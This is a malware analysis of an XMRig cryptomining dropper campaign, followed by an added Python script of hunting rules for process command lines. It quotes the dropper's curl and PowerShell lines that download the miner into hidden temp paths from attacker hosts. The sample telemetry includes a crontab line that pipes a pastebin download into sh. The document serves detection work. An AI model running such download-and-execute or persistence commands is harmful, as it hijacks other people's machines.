


# Dropper Script Analysis

As mentioned earlier, the first part of the dropper scripts removes competing crypto-mining processes and their related files.

On Linux systems:

On Windows systems:

In the next step, the script establishes persistence by adding a crontab entry or scheduled task, and downloads additional files from publicly available platforms that sometimes host malware (pastebin).

On Linux systems:

On Windows systems:

The script then finally downloads the XMRig cryptocurrency miner files.

The files are written to temporary locations, masked as legitimate services/executables.

Finally, the start of XMRig mining and the execution of post-exploitation scripts are done separately.

The set of actions described above is carried out differently depending on the target operating system.

On Linux systems:

Downloaded XMRig cryptocurrency miner files:

```
curl -fsSL hxxp://2711348080/docs/s/config.json -o /tmp/.solr/config.json   - Miner config file
curl -fsSL hxxp://22212247272143/auth/solrd.exe -o /tmp/.solr/solrd        - XMRig miner
curl -fsSL hxxp://2711348080/docs/s/solr.sh -o /tmp/.solr/solr.sh          - XMRig miner starter script
```

The script then executes the solr.sh miner starter script, which in turn executes solrd, the XMRig miner binary that starts the mining process.

On Windows systems:

First some variables are set, followed by a custom function, function Update($url,$path,$proc_name), that performs file downloads using the WebClient.DownloadFile method of a WebClient object; the function is used later in the script.

XMRig miner executable, miner name and path:

```powershell
$miner_url = 'hxxp://22212247272143/auth/xmrig.exe'
$miner_name = 'javae'
$miner_path = '$env:TMP\javae.exe'
```

Miner configuration file, name and path:

```powershell
$miner_cfg_url = 'hxxp://2711348080/docs/s/config.json'
$miner_cfg_name = 'config.json'
$miner_cfg_path = '$env:TMP\config.json'
```

Clean-up batch script (clean.bat), name and path:

```powershell
$killmodule_url = 'hxxp://2711348080/examples/clean.bat'
$killmodule_name = 'clean.bat'
$killmodule_path = '$env:TMP\clean.bat'
```

After the script variables are set, the script performs the following actions:

It clears the System File, Hidden File and Read-Only attributes from any previously installed miner configuration files (config.json), and deletes the related files and folders.

Using the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to that function.

Next it sets the System File, Hidden File and Read-Only attributes on the newly downloaded miner files and starts the miner process.

The last step is executing the clean-up batch script and terminating the powershell.exe process.

# Attacker Origin

The threat actors' TTPs (tactics, techniques, procedures) aren't new, and we've seen similar attack campaigns in the past.
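As an added example (not code from the original post, nor from the campaign it analyses), the following Python script turns the dropper behaviour described in the analysis into hunting rules that run over process command-line telemetry from both Linux and Windows hosts: a download tool fetching from a decimal-form IP host or from pastebin, writes into a dot-prefixed /tmp directory or the user temp folder, attrib +s +h +r on temp files, crontab/schtasks persistence, and the final taskkill of powershell.exe. The sample telemetry lines are constructed; the two numeric hosts in them are the ones quoted in the analysis, and the pastebin path is a placeholder. The decoder converts a decimal (dword-form) host into dotted-quad notation and rejects values that do not fit in 32 bits, which is what happens to the second host in the analysis.

```python
"""Hunt for XMRig-dropper TTPs in process command-line telemetry.

Added example for this write-up: rules are derived from the behaviour the
analysis describes; the sample lines below are constructed, not captured.
"""
import re
from ipaddress import IPv4Address

# curl/wget and the .NET WebClient download methods the dropper relies on.
DOWNLOAD = re.compile(r"\bcurl\b|\bwget\b|DownloadFile|DownloadString", re.I)
# Numeric ("dword") host in a URL, e.g. http://2711348080/docs/s/config.json
NUMERIC_HOST = re.compile(r"https?://(\d+)(?=[/:\s'\")]|$)")
# Dot-prefixed directory under /tmp, or the Windows user temp folder.
HIDDEN_TMP = re.compile(r"/tmp/\.[^\s/]+|\$env:TMP|%TMP%|%TEMP%|\\Temp\\", re.I)
PASTE_SITE = re.compile(r"pastebin\.com", re.I)
# attrib setting System, Hidden or Read-Only on a file.
ATTRIB_HIDE = re.compile(r"\battrib\b[^|&]*\+[shr]", re.I)
PERSISTENCE = re.compile(r"\bcrontab\b|\bschtasks(?:\.exe)?\s+/create", re.I)
KILL_POWERSHELL = re.compile(
    r"\btaskkill\b.*\bpowershell|\bStop-Process\b.*\bpowershell", re.I)


def decode_decimal_ip(host):
    """Return the dotted-quad form of a decimal host, or None if it is not a
    valid 32-bit value (the second host in the analysis falls in that case)."""
    if not host.isdigit():
        return None
    value = int(host)
    if value > 0xFFFFFFFF:
        return None
    return str(IPv4Address(value))


def tag_line(cmdline):
    """Return (set of behaviour tags, list of decoded numeric hosts)."""
    tags, decoded = set(), []
    if DOWNLOAD.search(cmdline):
        tags.add("download_tool")
    for match in NUMERIC_HOST.finditer(cmdline):
        ip = decode_decimal_ip(match.group(1))
        if ip is None:
            tags.add("numeric_host_unparseable")  # still worth a look
        else:
            tags.add("decimal_ip_host")
            decoded.append(ip)
    if HIDDEN_TMP.search(cmdline):
        tags.add("hidden_tmp_path")
    if PASTE_SITE.search(cmdline):
        tags.add("paste_site")
    if ATTRIB_HIDE.search(cmdline):
        tags.add("attrib_hide")
    if PERSISTENCE.search(cmdline):
        tags.add("persistence")
    if KILL_POWERSHELL.search(cmdline):
        tags.add("kill_powershell")
    return tags, decoded


def hunt(lines, threshold=2):
    """Tag every line; a line is flagged when it carries `threshold` or more
    of the dropper behaviours (single tags are too common on their own)."""
    results = []
    for index, line in enumerate(lines):
        tags, decoded = tag_line(line)
        results.append({"index": index, "cmdline": line, "tags": sorted(tags),
                        "decoded_hosts": decoded, "flagged": len(tags) >= threshold})
    return results


def flagged_indices(lines, threshold=2):
    return [r["index"] for r in hunt(lines, threshold) if r["flagged"]]


# Constructed sample telemetry (hosts from the analysis, pastebin path is a placeholder).
SAMPLE_TELEMETRY = [
    "curl -fsSL http://2711348080/docs/s/config.json -o /tmp/.solr/config.json",
    "curl -fsSL http://22212247272143/auth/solrd.exe -o /tmp/.solr/solrd",
    "sh /tmp/.solr/solr.sh",
    "(crontab -l 2>/dev/null; echo '* * * * * curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh') | crontab -",
    "powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://2711348080/docs/s/config.json','$env:TMP\\config.json')",
    "attrib +s +h +r C:\\Users\\user\\AppData\\Local\\Temp\\javae.exe",
    "taskkill /F /IM powershell.exe",
    "curl -fsSL https://example.com/install.sh -o /tmp/install.sh",
    "git status",
]

if __name__ == "__main__":
    for result in hunt(SAMPLE_TELEMETRY):
        if result["flagged"]:
            print(result["index"], result["tags"], result["decoded_hosts"], result["cmdline"])
```

The two-tag threshold is a tuning choice: a lone curl or a lone taskkill is routine on most hosts, whereas a download from a numeric host into a hidden temp directory, or attrib hiding a binary in the temp folder, is the combination the analysis describes. Decoded hosts are returned rather than just printed so the same rules can feed a SIEM enrichment step.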
